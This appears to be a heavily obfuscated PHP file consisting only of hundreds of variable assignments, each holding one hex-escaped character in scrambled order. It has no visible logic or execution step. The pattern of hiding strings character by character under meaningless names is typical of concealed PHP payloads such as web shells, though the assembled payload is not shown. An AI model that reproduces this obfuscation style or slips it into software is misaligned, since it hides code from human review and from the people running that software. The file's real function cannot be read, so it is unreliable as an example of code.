$tdkr1652="\x69";
$tdkr146="\x6d";$tdkr143="\x65";$tdkr1186="\x69";$tdkr1375="\x3c";$tdkr1399="\x2e";$tdkr470="\x65";$tdkr357="\x68";$tdkr1051="\x65";$tdkr785="\x29";$tdkr391="\x09";$tdkr1424="\x28";$tdkr255="\x75";$tdkr422="\x64";$tdkr553="\x6e";$tdkr502="\x72";$tdkr471="\x64";
$tdkr329="\x6c";$tdkr3="\x6f";$tdkr254="\x62";$tdkr52="\x73";$tdkr1392="\x73";$tdkr1543="\x20";$tdkr522="\x68";$tdkr519="\x66";$tdkr1298="\x72";
$tdkr617="\x09";$tdkr1267="\x24";$tdkr208="\x78";$tdkr845="\x6e";$tdkr119="\x6c";$tdkr453="\x20";$tdkr397="\x40";$tdkr730="\x72";$tdkr360="\x73";$tdkr1327="\x6e";$tdkr229="\x65";
$tdkr964="\x31";$tdkr1514="\x20";$tdkr99="\x6c";$tdkr1606="\x69";$tdkr493="\x62";$tdkr1329="\x28";$tdkr195="\x74";$tdkr1184="\x3d";
$tdkr1115="\x5f";$tdkr1701="\x6f";
$tdkr89="\x72";$tdkr290="\x63";$tdkr1401="\x20";$tdkr1041="\x3b";$tdkr1409="\x28";
$tdkr1011="\x3b";
$tdkr954="\x28";$tdkr35="\x69";$tdkr166="\x73";$tdkr438="\x72";$tdkr85="\x31";$tdkr435="\x20";$tdkr469="\x6c";$tdkr712="\x64";$tdkr1443="\x72";$tdkr585="\x72";$tdkr1317="\x6c";$tdkr217="\x0a";
$tdkr1491="\x6f";$tdkr1232="\x24";$tdkr1672="\x63";$tdkr183="\x3b";$tdkr708="\x20";$tdkr665="\x3d";
$tdkr450="\x61";$tdkr396="\x20";$tdkr991="\x5c";$tdkr871="\x20";$tdkr718="\x24";$tdkr1208="\x65";$tdkr630="\x20";$tdkr434="\x74";$tdkr990="\x22";$tdkr507="\x63";$tdkr969="\x3d";$tdkr968="\x20";$tdkr559="\x29";$tdkr0="\x23";$tdkr1525="\x73";$tdkr494="\x75";$tdkr1506="\x6f";$tdkr426="\x7a";
$tdkr758="\x20";$tdkr98="\x6c";
$tdkr500="\x6f";$tdkr831="\x64";
$tdkr891="\x09";$tdkr1098="\x0a";$tdkr1338="\x6d";$tdkr13="\x50";$tdkr267="\x79";$tdkr608="\x64";
$tdkr546="\x70";$tdkr1265="\x2c";$tdkr942="\x20";$tdkr237="\x67";$tdkr306="\x69";$tdkr358="\x20";$tdkr15="\x72";
$tdkr1248="\x6a";$tdkr376="\x63";$tdkr1102="\x20";$tdkr1453="\x3b";$tdkr248="\x3b";
$tdkr1204="\x0a";$tdkr1538="\x65";$tdkr359="\x40";$tdkr154="\x09";$tdkr1146="\x0a";$tdkr1528="\x72";$tdkr975="\x0a";$tdkr1655="\x22";
$tdkr1619="\x28";$tdkr1096="\x0a";
$tdkr523="\x65";
$tdkr1119="\x66";$tdkr698="\x24";$tdkr1455="\x7d";$tdkr25="\x72";$tdkr1312="\x09";$tdkr907="\x61";$tdkr340="\x65";$tdkr540="\x5c";$tdkr286="\x20";
$tdkr766="\x20";$tdkr1180="\x20";
$tdkr726="\x28";$tdkr988="\x3d";$tdkr1395="\x69";
$tdkr1005="\x24";$tdkr256="\x69";$tdkr1589="\x65";
$tdkr998="\x72";$tdkr817="\x29";
$tdkr1512="\x20";$tdkr1417="\x6e";$tdkr77="\x65";$tdkr1300="\x6e";$tdkr1303="\x73";$tdkr1277="\x5b";$tdkr505="\x74";$tdkr1471="\x75";$tdkr1079="\x09";$tdkr86="\x20";$tdkr1612="\x63";$tdkr177="\x24";$tdkr265="\x72";$tdkr1144="\x5f";
$tdkr823="\x6e";$tdkr533="\x68";
$tdkr141="\x20";$tdkr1444="\x6e";$tdkr571="\x0a";$tdkr323="\x20";$tdkr1441="\x74";$tdkr636="\x20";$tdkr859="\x24";$tdkr771="\x6e";$tdkr1234="\x2c";$tdkr775="\x61";$tdkr147="\x6f";$tdkr837="\x22";$tdkr1309="\x0a";$tdkr1658="\x0a";
$tdkr755="\x5c";$tdkr1430="\x37";
$tdkr515="\x65";$tdkr377="\x6f";$tdkr710="\x69";$tdkr1682="\x63";
$tdkr1203="\x3b";$tdkr1662="\x6e";$tdkr1535="\x69";$tdkr754="\x22";
$tdkr753="\x20";$tdkr1131="\x24";$tdkr468="\x66";$tdkr721="\x2c";$tdkr432="\x69";$tdkr902="\x22";$tdkr272="\x74";$tdkr403="\x65";$tdkr1687="\x22";
$tdkr387="\x29";$tdkr570="\x3b";$tdkr717="\x5b";$tdkr724="\x72";$tdkr1178="\x6d";$tdkr1448="\x74";$tdkr862="\x3d";$tdkr244="\x69";$tdkr1211="\x20";$tdkr936="\x5c";$tdkr1646="\x65";
$tdkr68="\x63";$tdkr374="\x28";$tdkr1479="\x6f";$tdkr851="\x3b";
$tdkr1095="\x7d";$tdkr1198="\x2b";$tdkr978="\x0a";$tdkr1048="\x63";$tdkr1595="\x70";$tdkr418="\x20";
$tdkr1640="\x61";$tdkr1458="\x23";$tdkr353="\x09";$tdkr1452="\x67";$tdkr1315="\x20";$tdkr743="\x09";$tdkr260="\x61";$tdkr605="\x6d";$tdkr1490="\x79";$tdkr892="\x24";
$tdkr526="\x79";$tdkr1370="\x3b";$tdkr1387="\x7b";
$tdkr321="\x30";$tdkr30="\x67";$tdkr1188="\x74";$tdkr737="\x5d";$tdkr1586="\x3d";$tdkr91="\x69";$tdkr9="\x61";$tdkr1064="\x24";$tdkr1097="\x0a";
$tdkr1116="\x73";$tdkr41="\x29";$tdkr1280="\x2c";$tdkr1669="\x63";$tdkr51="\x61";$tdkr750="\x20";$tdkr692="\x5c";$tdkr497="\x64";
$tdkr1680="\x0a";$tdkr1357="\x6f";$tdkr1103="\x66";
$tdkr1202="\x29";$tdkr412="\x7d";$tdkr1037="\x61";$tdkr1609="\x20";$tdkr347="\x69";$tdkr790="\x20";$tdkr1345="\x69";$tdkr1546="\x64";$tdkr956="\x61";$tdkr121="\x20";$tdkr876="\x72";$tdkr1133="\x31";$tdkr71="\x73";$tdkr1331="\x29";$tdkr803="\x61";$tdkr1402="\x73";
$tdkr1262="\x5b";
$tdkr787="\x20";$tdkr285="\x73";$tdkr400="\x64";$tdkr549="\x20";
$tdkr1087="\x24";$tdkr1474="\x69";
$tdkr271="\x20";$tdkr1039="\x65";$tdkr1459="\x20";$tdkr672="\x74";
$tdkr644="\x74";$tdkr1090="\x6f";$tdkr1210="\x74";$tdkr456="\x20";$tdkr513="\x61";$tdkr839="\x24";$tdkr863="\x20";$tdkr1575="\x69";$tdkr1400="\x3d";$tdkr623="\x24";$tdkr16="\x6c";$tdkr64="\x72";$tdkr31="\x20";$tdkr462="\x65";$tdkr1702="\x6e";
$tdkr832="\x65";$tdkr477="\x68";$tdkr1532="\x2c";$tdkr809="\x74";$tdkr1656="\x29";$tdkr1214="\x20";$tdkr1661="\x69";$tdkr795="\x09";$tdkr1608="\x74";
$tdkr395="\x68";$tdkr957="\x6e";$tdkr514="\x74";$tdkr1163="\x61";$tdkr1194="\x28";$tdkr599="\x0a";$tdkr1249="\x2c";$tdkr1036="\x6e";$tdkr191="\x63";$tdkr1394="\x72";
$tdkr882="\x2b";$tdkr378="\x64";$tdkr1541="\x68";
$tdkr1635="\x76";$tdkr70="\x6e";
$tdkr1092="\x65";$tdkr798="\x0a";$tdkr181="\x20";$tdkr148="\x72";
$tdkr39="\x28";
$tdkr811="\x20";
$tdkr307="\x70";
$tdkr203="\x40";$tdkr216="\x3b";$tdkr1363="\x20";$tdkr261="\x6e";$tdkr545="\x69";
$tdkr895="\x6f";
$tdkr1683="\x3d";
$tdkr842="\x61";$tdkr762="\x28";
$tdkr647="\x2b";$tdkr259="\x20";$tdkr486="\x20";$tdkr330="\x65";$tdkr169="\x66";$tdkr804="\x6c";
$tdkr865="\x3b";
$tdkr1597="\x28";
$tdkr846="\x61";$tdkr1513="\x34";$tdkr293="\x62";$tdkr1613="\x3b";$tdkr37="\x65";$tdkr829="\x63";$tdkr1519="\x72";
$tdkr238="\x65";$tdkr1403="\x70";$tdkr1407="\x74";$tdkr1270="\x20";$tdkr877="\x69";
$tdkr816="\x28";$tdkr742="\x09";$tdkr1398="\x20";$tdkr97="\x41";$tdkr32="\x65";$tdkr915="\x2e";$tdkr1560="\x72";$tdkr324="\x24";$tdkr1281="\x20";$tdkr887="\x20";$tdkr58="\x4b";
$tdkr161="\x64";$tdkr911="\x61";$tdkr1169="\x24";$tdkr696="\x2c";$tdkr952="\x6e";$tdkr1290="\x7d";$tdkr6="\x2d";$tdkr1191="\x61";
$tdkr370="\x62";$tdkr1254="\x3b";$tdkr1457="\x0a";$tdkr452="\x6b";$tdkr273="\x68";$tdkr1057="\x65";$tdkr361="\x63";$tdkr1294="\x73";$tdkr241="\x72";$tdkr1587="\x20";$tdkr1007="\x2e";$tdkr233="\x24";$tdkr1411="\x25";
$tdkr275="\x20";$tdkr371="\x73";$tdkr1418="\x74";$tdkr885="\x69";$tdkr691="\x78";$tdkr476="\x74";$tdkr1679="\x3b";$tdkr544="\x72";$tdkr231="\x29";$tdkr580="\x6d";$tdkr472="\x0a";$tdkr405="\x2c";$tdkr1650="\x61";$tdkr1654="\x6e";$tdkr518="\x09";$tdkr496="\x6c";$tdkr1620="\x4f";
$tdkr1663="\x74";$tdkr560="\x3b";
$tdkr7="\x70";$tdkr1602="\x3b";
$tdkr1015="\x24";$tdkr1583="\x6e";$tdkr33="\x6e";$tdkr1318="\x20";$tdkr188="\x20";$tdkr756="\x6e";$tdkr294="\x75";
$tdkr1094="\x0a";$tdkr1584="\x63";$tdkr1428="\x2b";$tdkr983="\x6f";$tdkr971="\x20";$tdkr1412="\x63";$tdkr525="\x5f";$tdkr792="\x29";$tdkr561="\x0a";$tdkr994="\x2e";$tdkr1571="\x6e";$tdkr908="\x72";$tdkr1710="\x24";$tdkr1356="\x66";$tdkr215="\x29";
$tdkr110="\x73";$tdkr157="\x20";$tdkr49="\x65";$tdkr90="\x73";$tdkr569="\x30";$tdkr1678="\x4f";$tdkr1304="\x74";$tdkr1018="\x6f";$tdkr638="\x23";$tdkr1049="\x6f";$tdkr1271="\x3d";$tdkr415="\x0a";$tdkr84="\x2d";$tdkr853="\x09";$tdkr650="\x69";$tdkr1145="\x3b";$tdkr1653="\x6f";
$tdkr162="\x65";$tdkr1251="\x24";$tdkr1362="\x79";$tdkr664="\x2e";$tdkr200="\x29";
$tdkr1344="\x72";$tdkr401="\x65";$tdkr1012="\x0a";$tdkr1255="\x0a";$tdkr704="\x61";$tdkr800="\x23";$tdkr1580="\x29";
$tdkr1354="\x0a";$tdkr1299="\x61";$tdkr579="\x61";$tdkr1515="\x67";
$tdkr776="\x6e";$tdkr1427="\x29";$tdkr736="\x69";$tdkr417="\x23";$tdkr651="\x29";$tdkr1179="\x79";
$tdkr1623="\x3e";$tdkr1420="\x72";$tdkr935="\x22";
$tdkr982="\x63";$tdkr75="\x65";$tdkr1021="\x20";$tdkr719="\x69";$tdkr368="\x73";$tdkr1274="\x24";
$tdkr854="\x66";$tdkr1585="\x20";
$tdkr309="\x0a";$tdkr279="\x72";$tdkr465="\x68";$tdkr1289="\x0a";$tdkr1082="\x74";$tdkr382="\x24";$tdkr87="\x76";$tdkr873="\x23";$tdkr970="\x3d";$tdkr680="\x25";
$tdkr1475="\x76";$tdkr283="\x65";$tdkr701="\x72";$tdkr1495="\x6e";
$tdkr1508="\x70";$tdkr949="\x20";
$tdkr906="\x76";$tdkr984="\x64";$tdkr1667="\x24";$tdkr697="\x20";$tdkr474="\x23";$tdkr965="\x29";
$tdkr1197="\x20";$tdkr1562="\x77";$tdkr810="\x65";$tdkr242="\x61";$tdkr590="\x73";$tdkr464="\x73";$tdkr1405="\x69";$tdkr342="\x3b";$tdkr903="\x5c";$tdkr558="\x73";$tdkr164="\x3d";$tdkr223="\x6e";$tdkr1135="\x20";$tdkr819="\x73";
$tdkr116="\x2c";$tdkr1275="\x61";$tdkr602="\x79";$tdkr1113="\x65";$tdkr501="\x72";$tdkr601="\x6d";$tdkr1330="\x33";$tdkr127="\x20";$tdkr824="\x67";$tdkr96="\x20";$tdkr679="\x73";$tdkr1565="\x67";$tdkr1073="\x3b";$tdkr186="\x6d";$tdkr402="\x78";$tdkr1436="\x7d";$tdkr1704="\x0a";$tdkr1117="\x68";$tdkr364="\x70";$tdkr1122="\x65";$tdkr1237="\x6a";$tdkr1671="\x0a";$tdkr1259="\x24";$tdkr107="\x20";$tdkr1093="\x3b";
$tdkr1638="\x5f";
$tdkr1223="\x3b";$tdkr234="\x24";$tdkr60="\x61";
$tdkr856="\x72";
$tdkr669="\x72";$tdkr953="\x74";$tdkr1059="\x61";
$tdkr1442="\x75";
$tdkr128="\x72";$tdkr1561="\x6f";$tdkr642="\x69";$tdkr1311="\x0a";$tdkr180="\x3d";$tdkr439="\x61";$tdkr1572="\x65";$tdkr443="\x6b";$tdkr207="\x65";$tdkr783="\x31";
$tdkr298="\x20";$tdkr566="\x20";$tdkr687="\x78";$tdkr1527="\x6f";$tdkr1291="\x0a";
$tdkr1288="\x7d";$tdkr1086="\x20";$tdkr315="\x28";$tdkr425="\x69";$tdkr1675="\x73";
$tdkr1521="\x74";$tdkr586="\x61";$tdkr620="\x72";$tdkr1069="\x6e";$tdkr249="\x0a";$tdkr987="\x2e";$tdkr1218="\x3d";$tdkr480="\x20";$tdkr380="\x2c";$tdkr940="\x69";
$tdkr167="\x68";$tdkr932="\x2e";$tdkr1076="\x0a";$tdkr257="\x6c";$tdkr214="\x28";$tdkr140="\x62";$tdkr759="\x69";$tdkr796="\x7d";$tdkr1243="\x24";$tdkr1673="\x6c";
$tdkr1460="\x74";$tdkr955="\x72";$tdkr1361="\x6d";$tdkr781="\x29";$tdkr170="\x74";$tdkr100="\x20";$tdkr373="\x72";$tdkr1578="\x20";
$tdkr288="\x68";$tdkr1364="\x24";$tdkr841="\x76";$tdkr475="\x20";$tdkr918="\x69";$tdkr1104="\x69";
$tdkr640="\x63";$tdkr1432="\x29";
$tdkr945="\x24";$tdkr1209="\x78";$tdkr641="\x72";$tdkr454="\x6f";
$tdkr1487="\x6e";$tdkr899="\x2e";
$tdkr530="\x73";$tdkr535="\x66";$tdkr770="\x69";$tdkr1463="\x73";$tdkr1110="\x79";$tdkr112="\x72";$tdkr1531="\x6f";
$tdkr1297="\x20";$tdkr1666="\x20";$tdkr1598="\x24";
$tdkr1404="\x72";$tdkr1256="\x09";$tdkr658="\x6d";$tdkr322="\x3b";
$tdkr1576="\x61";$tdkr1014="\x09";$tdkr1176="\x09";$tdkr997="\x61";$tdkr1368="\x20";$tdkr1173="\x20";$tdkr1604="\x70";
$tdkr1692="\x24";$tdkr1599="\x24";$tdkr929="\x64";$tdkr352="\x09";$tdkr555="\x65";$tdkr1482="\x2c";$tdkr1594="\x72";$tdkr367="\x20";$tdkr1137="\x61";$tdkr1473="\x73";$tdkr274="\x65";$tdkr604="\x24";$tdkr408="\x69";
$tdkr1507="\x6d";$tdkr1685="\x6e";$tdkr1634="\x24";$tdkr163="\x20";$tdkr269="\x6f";$tdkr581="\x65";$tdkr484="\x77";$tdkr1450="\x69";$tdkr880="\x3b";$tdkr627="\x20";$tdkr962="\x29";$tdkr1030="\x27";
$tdkr123="\x65";$tdkr878="\x70";$tdkr516="\x72";$tdkr596="\x28";$tdkr1238="\x5d";$tdkr1564="\x6e";$tdkr977="\x7d";$tdkr1067="\x72";$tdkr1691="\x2b";$tdkr1350="\x20";$tdkr521="\x73";$tdkr686="\x5c";
$tdkr1461="\x68";$tdkr699="\x76";$tdkr713="\x65";$tdkr1618="\x6e";$tdkr1496="\x6c";$tdkr611="\x3d";$tdkr761="\x20";$tdkr1196="\x69";$tdkr55="\x61";$tdkr1023="\x3d";
$tdkr1307="\x6e";$tdkr1222="\x6a";
$tdkr512="\x6c";$tdkr1227="\x40";$tdkr1603="\x0a";
$tdkr814="\x61";$tdkr363="\x69";$tdkr1643="\x2d";$tdkr976="\x09";
$tdkr920="\x22";$tdkr1072="\x65";$tdkr1081="\x65";$tdkr1668="\x6e";$tdkr1567="\x65";$tdkr1631="\x70";$tdkr1670="\x3b";$tdkr534="\x75";$tdkr185="\x09";$tdkr1284="\x5d";$tdkr506="\x20";$tdkr802="\x63";
$tdkr325="\x69";$tdkr1706="\x76";$tdkr1206="\x09";$tdkr314="\x20";$tdkr828="\x6d";
$tdkr93="\x6e";
$tdkr1389="\x09";$tdkr927="\x63";$tdkr245="\x6f";$tdkr705="\x6d";
$tdkr461="\x77";$tdkr1323="\x74";$tdkr657="\x24";$tdkr1124="\x7b";$tdkr941="\x66";
$tdkr844="\x5f";
$tdkr1383="\x24";$tdkr19="\x6f";$tdkr38="\x20";$tdkr779="\x32";$tdkr102="\x69";$tdkr1293="\x0a";$tdkr707="\x2c";$tdkr1239="\x20";$tdkr1423="\x64";$tdkr1061="\x20";$tdkr204="\x69";$tdkr532="\x73";$tdkr328="\x20";$tdkr1480="\x64";$tdkr1295="\x75";$tdkr1043="\x3b";$tdkr1301="\x64";
$tdkr1045="\x09";$tdkr66="\x23";
$tdkr1189="\x28";$tdkr42="\x20";$tdkr995="\x24";$tdkr308="\x74";
$tdkr1063="\x24";$tdkr1391="\x24";$tdkr706="\x65";$tdkr645="\x3b";$tdkr366="\x2c";$tdkr714="\x78";$tdkr1456="\x0a";$tdkr381="\x20";$tdkr69="\x6f";$tdkr428="\x20";$tdkr1410="\x22";$tdkr398="\x69";$tdkr1325="\x72";$tdkr960="\x32";$tdkr1201="\x29";$tdkr1382="\x2b";$tdkr1592="\x6d";$tdkr769="\x28";$tdkr551="\x40";$tdkr126="\x73";$tdkr124="\x66";$tdkr1379="\x3b";$tdkr550="\x5c";$tdkr751="\x2e";
$tdkr1258="\x40";
$tdkr414="\x0a";$tdkr610="\x20";$tdkr735="\x24";$tdkr618="\x66";$tdkr794="\x0a";$tdkr777="\x64";$tdkr201="\x2c";$tdkr1358="\x72";$tdkr40="\x43";$tdkr1579="\x3a";$tdkr1416="\x69";$tdkr1627="\x61";$tdkr890="\x09";
$tdkr424="\x6d";$tdkr1166="\x20";$tdkr1241="\x20";$tdkr67="\x20";$tdkr688="\x25";$tdkr1540="\x74";$tdkr1242="\x40";$tdkr383="\x69";
$tdkr222="\x61";$tdkr1616="\x70";$tdkr510="\x65";$tdkr933="\x3d";$tdkr1306="\x69";$tdkr1494="\x6f";$tdkr1009="\x3b";$tdkr939="\x20";
$tdkr1047="\x6d";$tdkr448="\x74";$tdkr165="\x20";$tdkr1112="\x74";$tdkr1511="\x65";$tdkr912="\x6d";$tdkr1406="\x6e";$tdkr986="\x20";$tdkr1581="\x0a";$tdkr327="\x3c";$tdkr1636="\x61";$tdkr1332="\x29";$tdkr789="\x3d";$tdkr835="\x3d";$tdkr1349="\x3d";$tdkr900="\x3d";
$tdkr565="\x69";$tdkr139="\x75";$tdkr22="\x20";$tdkr820="\x74";$tdkr1484="\x6d";$tdkr728="\x73";$tdkr134="\x65";$tdkr963="\x2b";$tdkr413="\x0a";$tdkr1629="\x6f";
$tdkr175="\x79";$tdkr24="\x6f";$tdkr1199="\x20";
$tdkr1003="\x65";$tdkr1637="\x72";
$tdkr568="\x20";$tdkr1451="\x6e";$tdkr48="\x53";$tdkr224="\x64";$tdkr1551="\x7a";$tdkr442="\x20";$tdkr632="\x69";$tdkr894="\x63";$tdkr573="\x24";$tdkr966="\x29";$tdkr588="\x64";$tdkr1264="\x69";$tdkr587="\x6e";
$tdkr1071="\x6d";
$tdkr1105="\x73";$tdkr1596="\x68";$tdkr731="\x69";$tdkr711="\x6e";$tdkr1320="\x20";$tdkr1031="\x24";$tdkr1639="\x6e";$tdkr764="\x24";$tdkr27="\x68";$tdkr905="\x24";$tdkr276="\x63";$tdkr548="\x2c";$tdkr243="\x74";$tdkr150="\x68";$tdkr227="\x69";$tdkr1601="\x29";$tdkr973="\x29";$tdkr1467="\x20";$tdkr1374="\x20";$tdkr53="\x74";$tdkr1477="\x20";
$tdkr1219="\x3d";$tdkr1622="\x22";$tdkr813="\x76";
$tdkr192="\x72";$tdkr1027="\x24";
$tdkr103="\x67";
$tdkr1390="\x09";$tdkr858="\x28";
$tdkr1686="\x63";$tdkr1074="\x22";$tdkr488="\x61";$tdkr433="\x70";
$tdkr614="\x22";$tdkr1570="\x6f";$tdkr1088="\x6d";$tdkr1365="\x69";$tdkr818="\x20";$tdkr629="\x3b";$tdkr478="\x65";$tdkr622="\x28";
$tdkr1408="\x66";$tdkr1568="\x78";$tdkr554="\x64";$tdkr74="\x67";$tdkr1269="\x5d";$tdkr840="\x24";$tdkr784="\x29";$tdkr703="\x6e";$tdkr1381="\x2b";$tdkr18="\x63";$tdkr1396="\x6e";$tdkr517="\x0a";$tdkr584="\x20";$tdkr349="\x20";$tdkr47="\x20";$tdkr220="\x73";$tdkr1688="\x3b";$tdkr205="\x6e";$tdkr466="\x75";$tdkr1337="\x09";$tdkr1700="\x69";$tdkr1224="\x0a";$tdkr1377="\x24";$tdkr1050="\x64";$tdkr749="\x65";
$tdkr372="\x74";
$tdkr270="\x66";$tdkr1316="\x24";$tdkr211="\x20";$tdkr173="\x09";$tdkr1002="\x6d";$tdkr1285="\x3b";$tdkr520="\x69";
$tdkr1549="\x73";$tdkr1026="\x5c";$tdkr671="\x6e";$tdkr212="\x3d";$tdkr857="\x20";$tdkr648="\x2b";$tdkr1481="\x65";$tdkr600="\x09";$tdkr1220="\x20";
$tdkr631="\x24";$tdkr788="\x3d";$tdkr351="\x0a";$tdkr282="\x74";$tdkr198="\x20";$tdkr1388="\x0a";$tdkr473="\x09";$tdkr1498="\x20";
$tdkr300="\x68";$tdkr196="\x20";$tdkr14="\x65";$tdkr747="\x6f";
$tdkr17="\x20";$tdkr993="\x22";$tdkr1029="\x3d";$tdkr702="\x5f";
$tdkr896="\x64";$tdkr155="\x6d";$tdkr109="\x65";$tdkr268="\x20";$tdkr1555="\x20";$tdkr317="\x69";$tdkr656="\x09";$tdkr45="\x30";
$tdkr1534="\x73";$tdkr1610="\x24";$tdkr1614="\x0a";$tdkr529="\x65";$tdkr1162="\x24";$tdkr1182="\x6a";$tdkr178="\x69";$tdkr670="\x69";
$tdkr1552="\x65";
$tdkr151="\x0a";$tdkr1435="\x09";$tdkr733="\x74";
$tdkr122="\x6c";$tdkr822="\x69";
$tdkr1305="\x72";$tdkr1547="\x65";$tdkr791="\x30";$tdkr187="\x79";$tdkr246="\x6e";
$tdkr619="\x6f";$tdkr1101="\x62";$tdkr1712="\x63";$tdkr667="\x73";$tdkr1083="\x75";
$tdkr118="\x61";$tdkr676="\x5c";$tdkr289="\x69";$tdkr1516="\x65";$tdkr723="\x6f";$tdkr1624="\x6d";
$tdkr1296="\x62";$tdkr1000="\x6e";
$tdkr1501="\x6e";$tdkr1384="\x69";$tdkr1001="\x61";$tdkr1263="\x24";
$tdkr1433="\x3b";$tdkr250="\x0a";$tdkr385="\x20";$tdkr284="\x72";$tdkr304="\x63";$tdkr1114="\x73";
$tdkr356="\x73";$tdkr592="\x72";
$tdkr1138="\x32";$tdkr1503="\x23";
$tdkr61="\x68";$tdkr1066="\x61";$tdkr409="\x3b";$tdkr1530="\x73";$tdkr1591="\x61";$tdkr344="\x2b";$tdkr626="\x3d";$tdkr628="\x30";$tdkr609="\x65";$tdkr677="\x24";$tdkr951="\x69";$tdkr1690="\x2b";$tdkr1346="\x6e";$tdkr1130="\x28";$tdkr108="\x72";$tdkr1136="\x24";$tdkr653="\x7b";$tdkr1693="\x67";$tdkr369="\x75";$tdkr1147="\x09";
$tdkr598="\x3b";$tdkr778="\x28";$tdkr1032="\x76";$tdkr639="\x73";$tdkr313="\x72";$tdkr924="\x09";
$tdkr194="\x70";$tdkr1537="\x63";
$tdkr156="\x79";$tdkr1013="\x0a";$tdkr455="\x6e";$tdkr334="\x68";$tdkr662="\x65";$tdkr1466="\x73";$tdkr1123="\x0a";$tdkr539="\x28";$tdkr171="\x3b";$tdkr1359="\x20";$tdkr1593="\x6f";$tdkr1539="\x20";$tdkr910="\x6e";
$tdkr1040="\x27";$tdkr1510="\x74";$tdkr262="\x20";$tdkr1118="\x75";
$tdkr1422="\x6e";
$tdkr1028="\x63";$tdkr931="\x20";$tdkr492="\x65";$tdkr1502="\x0a";
$tdkr1425="\x32";$tdkr808="\x61";$tdkr531="\x5f";$tdkr337="\x63";
$tdkr1286="\x0a";$tdkr1367="\x3d";$tdkr404="\x73";$tdkr1566="\x20";$tdkr179="\x20";
$tdkr681="\x64";$tdkr174="\x6d";$tdkr491="\x72";
$tdkr1705="\x65";$tdkr574="\x76";$tdkr1065="\x76";$tdkr137="\x0a";$tdkr1644="\x24";$tdkr1340="\x20";$tdkr1369="\x30";$tdkr1626="\x74";$tdkr1195="\x24";$tdkr1437="\x0a";$tdkr884="\x24";$tdkr666="\x20";$tdkr1676="\x65";$tdkr449="\x72";$tdkr1478="\x63";$tdkr345="\x2b";
$tdkr1108="\x72";$tdkr346="\x24";$tdkr34="\x67";$tdkr1648="\x65";$tdkr1174="\x7b";$tdkr980="\x24";$tdkr1235="\x20";$tdkr136="\x2e";$tdkr411="\x09";$tdkr1233="\x69";$tdkr806="\x75";$tdkr80="\x74";$tdkr1245="\x31";$tdkr874="\x73";$tdkr864="\x30";$tdkr1109="\x5f";$tdkr130="\x76";$tdkr479="\x6d";$tdkr311="\x66";$tdkr436="\x61";$tdkr499="\x63";$tdkr663="\x20";$tdkr332="\x67";$tdkr745="\x6d";$tdkr700="\x61";$tdkr1236="\x24";$tdkr1645="\x67";$tdkr451="\x63";$tdkr189="\x40";
$tdkr797="\x0a";
$tdkr421="\x6e";$tdkr292="\x20";
$tdkr744="\x24";$tdkr830="\x6f";$tdkr996="\x76";
$tdkr1229="\x61";$tdkr1078="\x0a";$tdkr1283="\x69";$tdkr1052="\x20";
$tdkr1192="\x6e";$tdkr889="\x0a";
$tdkr961="\x30";$tdkr28="\x69";$tdkr594="\x6e";
$tdkr158="\x24";$tdkr720="\x5d";$tdkr278="\x61";$tdkr1019="\x64";$tdkr807="\x6c";$tdkr152="\x7b";
$tdkr547="\x74";$tdkr1155="\x20";$tdkr410="\x0a";
$tdkr1055="\x20";$tdkr867="\x24";$tdkr801="\x20";$tdkr1152="\x28";$tdkr1469="\x65";$tdkr767="\x25";$tdkr1485="\x65";$tdkr1181="\x24";$tdkr1439="\x72";
$tdkr407="\x24";$tdkr429="\x73";
$tdkr1153="\x6d";
$tdkr922="\x0a";$tdkr826="\x09";$tdkr597="\x29";
$tdkr1708="\x6c";$tdkr444="\x65";$tdkr1419="\x28";
$tdkr1024="\x20";$tdkr1694="\x65";$tdkr297="\x64";$tdkr1183="\x20";$tdkr355="\x75";$tdkr431="\x72";$tdkr1328="\x64";
$tdkr1470="\x63";$tdkr583="\x3d";
$tdkr490="\x20";$tdkr1445="\x20";$tdkr72="\x74";$tdkr303="\x73";$tdkr909="\x5f";
$tdkr1172="\x29";$tdkr981="\x6d";$tdkr1134="\x2c";$tdkr870="\x3c";$tdkr1062="\x5c";$tdkr1699="\x74";$tdkr1120="\x66";
$tdkr838="\x5c";$tdkr441="\x2c";$tdkr1522="\x69";$tdkr934="\x20";$tdkr1651="\x74";
$tdkr683="\x5c";$tdkr430="\x63";$tdkr129="\x65";$tdkr1287="\x09";
$tdkr1157="\x69";$tdkr1333="\x2b";$tdkr1380="\x20";$tdkr682="\x3d";$tdkr43="\x32";
$tdkr427="\x65";$tdkr1625="\x65";$tdkr606="\x63";$tdkr153="\x0a";
$tdkr1006="\x69";$tdkr1542="\x65";
$tdkr1697="\x72";
$tdkr1319="\x3d";$tdkr1080="\x72";$tdkr760="\x66";$tdkr738="\x29";$tdkr577="\x5f";$tdkr29="\x6e";$tdkr861="\x20";
$tdkr1253="\x5d";$tdkr508="\x6f";$tdkr1212="\x69";$tdkr1008="\x22";$tdkr1695="\x6e";$tdkr572="\x09";$tdkr886="\x29";$tdkr593="\x69";$tdkr1464="\x20";$tdkr1611="\x6e";
$tdkr1017="\x63";$tdkr979="\x09";$tdkr1500="\x61";$tdkr1127="\x6d";$tdkr999="\x5f";$tdkr625="\x20";$tdkr1497="\x79";$tdkr247="\x29";$tdkr985="\x65";$tdkr1321="\x69";$tdkr1462="\x69";$tdkr1247="\x24";$tdkr1282="\x24";
$tdkr914="\x22";$tdkr1336="\x0a";$tdkr44="\x30";$tdkr1154="\x79";
$tdkr576="\x72";$tdkr88="\x65";
$tdkr11="\x6c";$tdkr1034="\x72";$tdkr280="\x61";$tdkr1664="\x20";$tdkr1577="\x6c";$tdkr83="\x6e";$tdkr1355="\x09";$tdkr1376="\x20";$tdkr836="\x20";$tdkr467="\x66";$tdkr1322="\x6e";$tdkr898="\x20";$tdkr992="\x24";
$tdkr1414="\x2c";$tdkr420="\x61";
$tdkr799="\x09";$tdkr1659="\x70";$tdkr1563="\x69";$tdkr868="\x69";
$tdkr232="\x25";$tdkr78="\x72";
$tdkr860="\x69";$tdkr1060="\x6c";$tdkr92="\x6f";$tdkr117="\x20";$tdkr331="\x6e";$tdkr318="\x20";$tdkr1556="\x69";$tdkr1149="\x6f";$tdkr419="\x72";
$tdkr457="\x68";$tdkr1342="\x73";$tdkr350="\x7b";$tdkr694="\x3b";$tdkr1033="\x61";
$tdkr527="\x61";$tdkr1022="\x2e";$tdkr944="\x28";$tdkr1261="\x32";
$tdkr341="\x29";$tdkr230="\x28";
$tdkr105="\x74";$tdkr446="\x70";$tdkr716="\x73";$tdkr685="\x5c";$tdkr901="\x20";$tdkr509="\x64";
